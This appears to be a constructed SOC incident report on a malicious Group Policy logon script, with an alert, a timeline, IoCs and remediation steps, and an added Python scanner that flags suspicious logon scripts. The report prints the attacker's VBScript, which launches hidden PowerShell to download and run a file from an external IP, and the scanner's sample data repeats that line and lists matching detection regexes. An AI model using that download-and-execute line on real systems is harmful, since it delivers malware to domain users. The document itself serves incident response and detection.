T1037 – Boot or Logon Initialization Scripts (Microsoft Defender for Identity Detection)

Microsoft Defender for Identity Alert Details
Alert ID: MDI-LOGON-SCRIPT-1037-7842
Alert Time: 2024-02-15 08:30:22 EST
Severity: HIGH (88/100)
Source: Microsoft Defender for Identity
Rule: “Suspicious Group Policy Object Modification”
MITRE ATT&CK: T1037.001 – Boot or Logon Initialization Scripts: Logon Script

Alert Details:

Detection: Group Policy Object modified to include malicious logon script

GPO Details:

- GPO Name: "Default Domain Policy"
- Modified By: DOMAIN\kjohnson (Karen Johnson – Domain Admin)
- Modification Time: 08:15 EST
- Source Host: DC-01 (Domain Controller)

Modification Details:

- Setting: User Configuration\Windows Settings\Scripts (Logon/Logoff)\Logon
- Script Name: "healthcheck.vbs"
- Script Parameters: ""
- Script Location: \\company.com\SYSVOL\company.com\scripts\healthcheck.vbs

Script Content (healthcheck.vbs):

```vbs
' Launches a hidden PowerShell that downloads update.ps1 from the external IP
' (defanged) and executes it with the execution policy bypassed.
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -WindowStyle Hidden -Command ""Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1""", 0, False
```

Anomaly Detection:

- Default Domain Policy rarely modified
- Logon script added to all domain users
- Script downloads and executes PowerShell from external URL
- No change management ticket for this modification
- kjohnson's account had unusual logins earlier (possible compromise)

Scope:

- All domain users (3,200+) will execute script at next logon
- Script executed at user logon (any workstation)
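The anomaly the alert describes, a GPO logon script whose body launches hidden PowerShell to fetch code from an external address, can be checked for directly by reading a GPO's `User\Scripts\scripts.ini` from SYSVOL and the script bodies it points at. The following is an added Python example, not part of the original report or of Microsoft Defender for Identity; the scripts.ini text and script bodies are constructed samples (198.51.100.10 is a documentation address standing in for the real host), and the indicator regexes are this example's own heuristics.

```python
import configparser
import re

# Constructed sample of a GPO's User\Scripts\scripts.ini (on SYSVOL it is UTF-16 encoded).
SAMPLE_SCRIPTS_INI = r"""[Logon]
0CmdLine=\\company.com\SYSVOL\company.com\scripts\healthcheck.vbs
0Parameters=
1CmdLine=mapdrives.vbs
1Parameters=
"""

# Constructed script bodies keyed by CmdLine, as if read from SYSVOL.
# 198.51.100.10 is a documentation address standing in for the real download host.
SAMPLE_SCRIPTS = {
    r"\\company.com\SYSVOL\company.com\scripts\healthcheck.vbs": (
        'Set objShell = CreateObject("Wscript.Shell")\n'
        'objShell.Run "powershell -WindowStyle Hidden -Command ""Invoke-WebRequest '
        '-Uri http://198.51.100.10/update.ps1 -OutFile %temp%\\update.ps1; '
        'powershell -ExecutionPolicy Bypass -File %temp%\\update.ps1""", 0, False'
    ),
    "mapdrives.vbs": (
        'Set objNet = CreateObject("WScript.Network")\n'
        'objNet.MapNetworkDrive "H:", "\\\\fs01\\home"'
    ),
}

# Heuristic indicators (this example's own, not an MDI rule set).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "web_download": re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass", re.I),
}


def parse_scripts_ini(text):
    """Return the ordered [Logon] entries as (cmdline, parameters) tuples."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str  # keep the 0CmdLine / 0Parameters casing
    cfg.read_string(text)
    entries = []
    if not cfg.has_section("Logon"):
        return entries
    section = cfg["Logon"]
    i = 0
    while f"{i}CmdLine" in section:
        entries.append((section[f"{i}CmdLine"], section.get(f"{i}Parameters", "")))
        i += 1
    return entries


def scan_logon_scripts(ini_text, script_bodies):
    """Map each logon script CmdLine to the indicator names its body (plus parameters) matches."""
    findings = {}
    for cmdline, params in parse_scripts_ini(ini_text):
        body = script_bodies.get(cmdline, "") + " " + params
        findings[cmdline] = [name for name, rx in INDICATORS.items() if rx.search(body)]
    return findings


if __name__ == "__main__":
    for cmdline, hits in scan_logon_scripts(SAMPLE_SCRIPTS_INI, SAMPLE_SCRIPTS).items():
        print(f"{'SUSPICIOUS' if hits else 'ok':10} {cmdline} {hits}")
```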

### SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed malicious GPO modification |
| 2. Immediate Action | Remove logon script from GPO | Group Policy Management Console | Script removed; GPO reverted |
| 3. Script Analysis | Analyze healthcheck.vbs | Sandbox, Manual Review | VBS downloads and runs PowerShell from malicious URL |
| 4. User Investigation | Check kjohnson account activity | Azure AD, CrowdStrike | kjohnson's credentials compromised; account used from unusual IP |
| 5. Account Remediation | Reset kjohnson password | Azure AD, AD | Password reset; MFA enforced |
| 6. Affected Users | Identify users who logged on during window | AD Logs, VPN Logs | 347 users logged on and executed script |

### Jira Incident Report

**Ticket:** SOC-2024-080

**Summary:** T1037 – Malicious Logon Script Added to Default Domain Policy

**Status:** RESOLVED

**Resolution:** MALICIOUS – Widespread Execution Contained

**Priority:** P1 – CRITICAL

**Labels:** T1037, logon-scripts, gpo, mdi, domain-compromise

**Components:** Identity-Management, Group-Policy, Incident-Response

**INCIDENT ANALYSIS REPORT**

**1. Initial Context:**

* **Detection Source:** Microsoft Defender for Identity.

* **Alert:** “Suspicious Group Policy Object Modification”.

* **GPO:** Default Domain Policy.

* **Modification:** Logon script added for all domain users.

* **Time:** 2024-02-15 08:30 EST.

* **Technique:** MITRE ATT&CK T1037.001 – Boot or Logon Initialization Scripts: Logon Script.

**2. Technical Analysis:**

* **Attack Chain:**

```
07:45 – kjohnson's credentials compromised via phishing
07:50 – Attacker logs into DC-01 from 45.134.225[.]78
08:00 – Attacker opens Group Policy Management Console
08:05 – Modifies Default Domain Policy
08:10 – Adds healthcheck.vbs as logon script
08:15 – GPO replicates to all domain controllers
08:16-08:30 – 347 users log on and execute script
08:30 – MDI alerts
```

* **Malicious Script:**
  - **File:** healthcheck.vbs
  - **Location:** \\company.com\SYSVOL\company.com\scripts\
  - **Function:** Runs hidden PowerShell to download update.ps1 from 185.143.221[.]89
  - **update.ps1:** Later analysis shows it's a Cobalt Strike downloader

* **Scope:**
  - 3,200+ domain users targeted
  - 347 users executed script before removal
  - 12 users had successful C2 connections (firewall logs)
  - No data exfiltration detected

* **Compromised Admin Account:**
  - User: kjohnson (Domain Admin)
  - Compromise method: Phishing (fake Office 365 login)
  - No MFA (now enforced)

**3. Investigation Findings:**

* **Timeline:**

```
07:45 – Credentials compromised
07:50 – Attacker logs into DC-01
08:00-08:15 – GPO modified
08:16-08:30 – Users log on, execute script
08:30 – Alert triggers
08:32 – SOC investigates
08:35 – GPO reverted
08:40 – Script deleted from SYSVOL
08:45 – kjohnson account disabled
```

* **Affected Users:**
  - 347 users executed script
  - 12 had successful C2 connections
  - All affected users contacted; passwords reset

* **Indicators of Compromise (IoCs):**

```
GPO:
- Default Domain Policy modified
- Logon script: healthcheck.vbs

Files:
- \\company.com\SYSVOL\company.com\scripts\healthcheck.vbs (SHA256: a1b2c3…)
- update.ps1 (SHA256: b2c3d4…)

Network:
- Download URL: http://185.143.221[.]89/update.ps1
- C2: 185.143.221[.]89:443

Account:
- kjohnson (compromised)
```

**4. Containment Actions:**

* **Immediate Actions:**
  - Removed logon script from Default Domain Policy.
  - Deleted healthcheck.vbs from SYSVOL.
  - Disabled kjohnson account.
  - Blocked malicious URLs at firewall and proxy.
  - Reset krbtgt password (as precaution).

* **Affected User Remediation:**
  - All 347 users contacted.
  - Passwords reset for those with C2 connections (12 users).
  - Endpoint scans on all affected workstations.
  - No persistent malware found (scripts were downloaders only).

* **Domain Controller Hardening:**
  - Restricted access to GPMC to specific admin workstations.
  - Enabled auditing for all GPO changes.
  - Implemented change management for GPO modifications.

**5. Root Cause Analysis:**

* **Primary Cause:** Domain Admin credentials compromised via phishing.

* **Contributing Factors:**

1. No MFA on admin accounts.

2. GPO modification allowed from any workstation.

3. No change management for GPO changes.

4. Logon scripts allowed to execute from network shares.

**6. Business Impact:**

* **Operational Impact:** 347 workstations potentially compromised; all cleaned.

* **Data Exposure:** None confirmed.

* **Productivity Impact:** 2-3 hours per affected user for password resets and scans.

* **Reputational Impact:** Internal only.

**7. Remediation & Prevention:**

**Completed Actions:**

- [x] Malicious GPO change reverted.
- [x] Compromised admin account secured.
- [x] Affected users remediated.
- [x] IOCs blocked.

**Technical Controls Enhanced:**

- [x] Enforced MFA for all admin accounts.
- [x] Implemented Privileged Access Workstations (PAWs) for admins.
- [x] Restricted GPO modification to specific admin workstations.
- [x] Enabled approval workflow for GPO changes.
- [x] Blocked PowerShell downloads from external URLs via GPO.
- [x] Enhanced monitoring for logon script modifications.

**8. Conclusion:**

An attacker compromised a Domain Admin and added a malicious logon script to the Default Domain Policy, affecting all domain users. 347 users executed the script before detection. MDI detected the anomalous GPO change within 15 minutes, enabling rapid containment. All affected systems were cleaned, and enhanced controls now prevent similar attacks.

**Closure Rationale:** GPO reverted; admin account secured; affected users remediated; controls enhanced.

**Analyst:** [Walter White], SOC Analyst

**Date:** 2024-02-15 11:00 EST
